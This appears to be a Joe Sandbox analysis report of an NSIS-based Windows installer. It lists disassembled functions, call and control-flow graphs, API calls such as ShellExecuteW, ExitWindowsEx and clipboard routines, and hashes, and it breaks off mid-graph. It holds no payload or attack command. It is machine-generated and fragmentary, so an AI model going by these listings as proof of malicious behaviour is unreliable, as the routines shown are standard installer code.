3981->3982 3983 403804 3982->3983 3984 40380e 3983->3984 3985 40674e 3 API calls 3983->3985 3984->3918 3986 403816 CreateDirectoryW 3985->3986 3987 405eab 2 API calls 3986->3987 3988 40382a 3987->3988 3988->3918 4104 405e7c GetFileAttributesW CreateFileW 3989->4104 3991 4035f3 4011 403603 3991->4011 4105 406035 lstrcpynW 3991->4105 3993 403619 4106 40677d lstrlenW 3993->4106 3997 40362a GetFileSize 3998 403726 3997->3998 4012 403641 3997->4012 4111 4032d2 3998->4111 4000 40372f 4002 40376b GlobalAlloc 4000->4002 4000->4011 4123 403368 SetFilePointer 4000->4123 4001 403336 ReadFile 4001->4012 4122 403368 SetFilePointer 4002->4122 4005 4037e9 4008 4032d2 6 API calls 4005->4008 4006 403786 4009 40337f 33 API calls 4006->4009 4007 40374c 4010 403336 ReadFile 4007->4010 4008->4011 4015 403792 4009->4015 4014 403757 4010->4014 4011->3924 4012->3998 4012->4001 4012->4005 4012->4011 4013 4032d2 6 API calls 4012->4013 4013->4012 4014->4002 4014->4011 4015->4011 4015->4015 4016 4037c0 SetFilePointer 4015->4016 4016->4011 4018 406328 3 API calls 4017->4018 4019 40596c 4018->4019 4020 405972 4019->4020 4021 405984 4019->4021 4137 405f7d wsprintfW 4020->4137 4022 405eff 3 API calls 4021->4022 4023 4059b5 4022->4023 4025 4059d4 lstrcatW 4023->4025 4027 405eff 3 API calls 4023->4027 4026 405982 4025->4026 4128 403ec1 4026->4128 4027->4025 4030 4067aa 18 API calls 4031 405a06 4030->4031 4032 405a9c 4031->4032 4034 405eff 3 API calls 4031->4034 4033 4067aa 18 API calls 4032->4033 4035 405aa2 4033->4035 4036 405a38 4034->4036 4037 405ab2 4035->4037 4038 406831 18 API calls 4035->4038 4036->4032 4040 405a5b lstrlenW 4036->4040 4043 405d32 CharNextW 4036->4043 4039 405ad2 LoadImageW 4037->4039 4139 403ea0 4037->4139 4038->4037 4041 405b92 4039->4041 4042 405afd RegisterClassW 4039->4042 4044 405a69 lstrcmpiW 4040->4044 4045 405a8f 4040->4045 4049 40141d 80 API calls 4041->4049 4047 405b9c 4042->4047 4048 405b45 SystemParametersInfoW CreateWindowExW 4042->4048 4050 405a56 4043->4050 4044->4045 4051 405a79 GetFileAttributesW 4044->4051 4053 40674e 3 API calls 4045->4053 4047->3934 4048->4041 4054 405b98 4049->4054 4050->4040 4055 405a85 4051->4055 4052 405ac8 4052->4039 4056 405a95 4053->4056 4054->4047 4057 403ec1 19 API calls 4054->4057 4055->4045 4058 40677d 2 API calls 4055->4058 4138 406035 lstrcpynW 4056->4138 4060 405ba9 4057->4060 4058->4045 4061 405bb5 ShowWindow LoadLibraryW 4060->4061 4062 405c38 4060->4062 4063 405bd4 LoadLibraryW 4061->4063 4064 405bdb GetClassInfoW 4061->4064 4065 405073 83 API calls 4062->4065 4063->4064 4066 405c05 DialogBoxParamW 4064->4066 4067 405bef GetClassInfoW RegisterClassW 4064->4067 4068 405c3e 4065->4068 4071 40141d 80 API calls 4066->4071 4067->4066 4069 405c42 4068->4069 4070 405c5a 4068->4070 4069->4047 4073 40141d 80 API calls 4069->4073 4072 40141d 80 API calls 4070->4072 4071->4047 4072->4047 4073->4047 4075 40389d 4074->4075 4076 40388f CloseHandle 4074->4076 4146 403caf 4075->4146 4076->4075 4081->3916 4199 406035 lstrcpynW 4082->4199 4084 4067bb 4085 405d85 4 API calls 4084->4085 4086 4067c1 4085->4086 4087 406064 5 API calls 4086->4087 4094 403ac3 4086->4094 4090 4067d1 4087->4090 4088 406809 lstrlenW 4089 406810 4088->4089 4088->4090 4092 40674e 3 API calls 4089->4092 4090->4088 4091 406301 2 API calls 4090->4091 4090->4094 4095 40677d 2 API calls 4090->4095 4091->4090 4093 406816 GetFileAttributesW 4092->4093 4093->4094 4094->3927 4096 406035 lstrcpynW 4094->4096 4095->4088 4096->3960 4097->3965 4098->3949 4099->3957 4100->3976 4102 405ca6 4101->4102 4103 405c9a CloseHandle 4101->4103 4102->3976 4103->4102 4104->3991 4105->3993 4107 40678c 4106->4107 4108 406792 CharPrevW 4107->4108 4109 40361f 4107->4109 4108->4107 4108->4109 4110 406035 lstrcpynW 4109->4110 4110->3997 4112 4032f3 4111->4112 4113 4032db 4111->4113 4116 403303 GetTickCount 4112->4116 4117 4032fb 4112->4117 4114 4032e4 DestroyWindow 4113->4114 4115 4032eb 4113->4115 4114->4115 4115->4000 4119 403311 CreateDialogParamW ShowWindow 4116->4119 4120 403334 4116->4120 4124 40635e 4117->4124 4119->4120 4120->4000 4122->4006 4123->4007 4125 40637b PeekMessageW 4124->4125 4126 406371 DispatchMessageW 4125->4126 4127 403301 4125->4127 4126->4125 4127->4000 4129 403ed5 4128->4129 4144 405f7d wsprintfW 4129->4144 4131 403f49 4132 406831 18 API calls 4131->4132 4133 403f55 SetWindowTextW 4132->4133 4134 403f70 4133->4134 4135 403f8b 4134->4135 4136 406831 18 API calls 4134->4136 4135->4030 4136->4134 4137->4026 4138->4032 4145 406035 lstrcpynW 4139->4145 4141 403eb4 4142 40674e 3 API calls 4141->4142 4143 403eba lstrcatW 4142->4143 4143->4052 4144->4131 4145->4141 4147 403cbd 4146->4147 4148 4038a2 4147->4148 4149 403cc2 FreeLibrary GlobalFree 4147->4149 4150 406cc7 4148->4150 4149->4148 4149->4149 4151 4067aa 18 API calls 4150->4151 4152 406cda 4151->4152 4153 406ce3 DeleteFileW 4152->4153 4154 406cfa 4152->4154 4193 4038ae CoUninitialize 4153->4193 4155 406e77 4154->4155 4197 406035 lstrcpynW 4154->4197 4161 406301 2 API calls 4155->4161 4181 406e84 4155->4181 4155->4193 4157 406d25 4158 406d39 4157->4158 4159 406d2f lstrcatW 4157->4159 4162 40677d 2 API calls 4158->4162 4160 406d3f 4159->4160 4164 406d4f lstrcatW 4160->4164 4166 406d57 lstrlenW FindFirstFileW 4160->4166 4163 406e90 4161->4163 4162->4160 4167 40674e 3 API calls 4163->4167 4163->4193 4164->4166 4165 4062cf 11 API calls 4165->4193 4170 406e67 4166->4170 4194 406d7e 4166->4194 4168 406e9a 4167->4168 4171 4062cf 11 API calls 4168->4171 4169 405d32 CharNextW 4169->4194 4170->4155 4172 406ea5 4171->4172 4173 405e5c 2 API calls 4172->4173 4174 406ead RemoveDirectoryW 4173->4174 4178 406ef0 4174->4178 4179 406eb9 4174->4179 4175 406e44 FindNextFileW 4177 406e5c FindClose 4175->4177 4175->4194 4177->4170 4180 404f9e 25 API calls 4178->4180 4179->4181 4182 406ebf 4179->4182 4180->4193 4181->4165 4184 4062cf 11 API calls 4182->4184 4183 4062cf 11 API calls 4183->4194 4185 406ec9 4184->4185 4188 404f9e 25 API calls 4185->4188 4186 406cc7 72 API calls 4186->4194 4187 405e5c 2 API calls 4189 406dfa DeleteFileW 4187->4189 4190 406ed3 4188->4190 4189->4194 4191 406c94 42 API calls 4190->4191 4191->4193 4192 404f9e 25 API calls 4192->4175 4193->3935 4193->3936 4194->4169 4194->4175 4194->4183 4194->4186 4194->4187 4194->4192 4195 404f9e 25 API calls 4194->4195 4196 406c94 42 API calls 4194->4196 4198 406035 lstrcpynW 4194->4198 4195->4194 4196->4194 4197->4157 4198->4194 4199->4084 4955 401cb2 4956 40145c 18 API calls 4955->4956 4957 401c54 4956->4957 4958 4062cf 11 API calls 4957->4958 4959 401c64 4957->4959 4960 401c59 4958->4960 4961 406cc7 81 API calls 4960->4961 4961->4959 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4962 402238 4963 40145c 18 API calls 4962->4963 4964 40223e 4963->4964 4965 4062cf 11 API calls 4964->4965 4966 40224b 4965->4966 4967 404f9e 25 API calls 4966->4967 4968 402255 4967->4968 4969 405c6b 2 API calls 4968->4969 4970 40225b 4969->4970 4971 4062cf 11 API calls 4970->4971 4979 4022ac CloseHandle 4970->4979 4976 40226d 4971->4976 4973 4030e3 4974 402283 WaitForSingleObject 4975 402291 GetExitCodeProcess 4974->4975 4974->4976 4978 4022a3 4975->4978 4975->4979 4976->4974 4977 40635e 2 API calls 4976->4977 4976->4979 4977->4974 4981 405f7d wsprintfW 4978->4981 4979->4973 4981->4979 3781 401eb9 3782 401f24 3781->3782 3785 401ec6 3781->3785 3783 401f53 GlobalAlloc 3782->3783 3787 401f28 3782->3787 3789 406831 18 API calls 3783->3789 3784 401ed5 3788 4062cf 11 API calls 3784->3788 3785->3784 3791 401ef7 3785->3791 3786 401f36 3805 406035 lstrcpynW 3786->3805 3787->3786 3790 4062cf 11 API calls 3787->3790 3800 401ee2 3788->3800 3793 401f46 3789->3793 3790->3786 3803 406035 lstrcpynW 3791->3803 3795 402708 3793->3795 3796 402387 GlobalFree 3793->3796 3796->3795 3797 401f06 3804 406035 lstrcpynW 3797->3804 3798 406831 18 API calls 3798->3800 3800->3795 3800->3798 3801 401f15 3806 406035 lstrcpynW 3801->3806 3803->3797 3804->3801 3805->3793 3806->3795 4982 404039 4983 404096 4982->4983 4984 404046 lstrcpynA lstrlenA 4982->4984 4984->4983 4985 404077 4984->4985 4985->4983 4986 404083 GlobalFree 4985->4986 4986->4983

                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                              Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                              • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                              • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                                                                                                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                              Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                              • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                              • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                                                                                                                                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                              Function 00406831 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 502 406831-40683c 503 40683e-40684d 502->503 504 40684f-406863 502->504 503->504 505 406865-406872 504->505 506 40687b-406881 504->506 505->506 507 406874-406877 505->507 508 406887-406888 506->508 509 406aad-406ab6 506->509 507->506 512 406889-406896 508->512 510 406ac1-406ac2 509->510 511 406ab8-406abc call 406035 509->511 511->510 514 406aab-406aac 512->514 515 40689c-4068ac 512->515 514->509 516 4068b2-4068b5 515->516 517 406a86 515->517 518 406a89 516->518 519 4068bb-4068f9 516->519 517->518 520 406a99-406a9c 518->520 521 406a8b-406a97 518->521 522 406a19-406a22 519->522 523 4068ff-40690a GetVersion 519->523 526 406a9f-406aa5 520->526 521->526 524 406a24-406a27 522->524 525 406a5b-406a64 522->525 527 406928 523->527 528 40690c-406914 523->528 532 406a37-406a46 call 406035 524->532 533 406a29-406a35 call 405f7d 524->533 530 406a72-406a84 lstrlenW 525->530 531 406a66-406a6d call 406831 525->531 526->512 526->514 529 40692f-406936 527->529 528->527 534 406916-40691a 528->534 536 406938-40693a 529->536 537 40693b-40693d 529->537 530->526 531->530 541 406a4b-406a51 532->541 533->541 534->527 540 40691c-406920 534->540 536->537 542 406979-40697c 537->542 543 40693f-406965 call 405eff 537->543 540->527 545 406922-406926 540->545 541->530 546 406a53-406a59 call 406064 541->546 548 40698c-40698f 542->548 549 40697e-40698a GetSystemDirectoryW 542->549 556 406a05-406a09 543->556 557 40696b-406974 call 406831 543->557 545->529 546->530 553 406991-40699f GetWindowsDirectoryW 548->553 554 4069fb-4069fd 548->554 552 4069ff-406a03 549->552 552->546 552->556 553->554 554->552 558 4069a1-4069ab 554->558 556->546 560 406a0b-406a17 lstrcatW 556->560 557->552 561 4069c5-4069db SHGetSpecialFolderLocation 558->561 562 4069ad-4069b0 558->562 560->546 564 4069f6-4069f8 561->564 565 4069dd-4069f4 SHGetPathFromIDListW 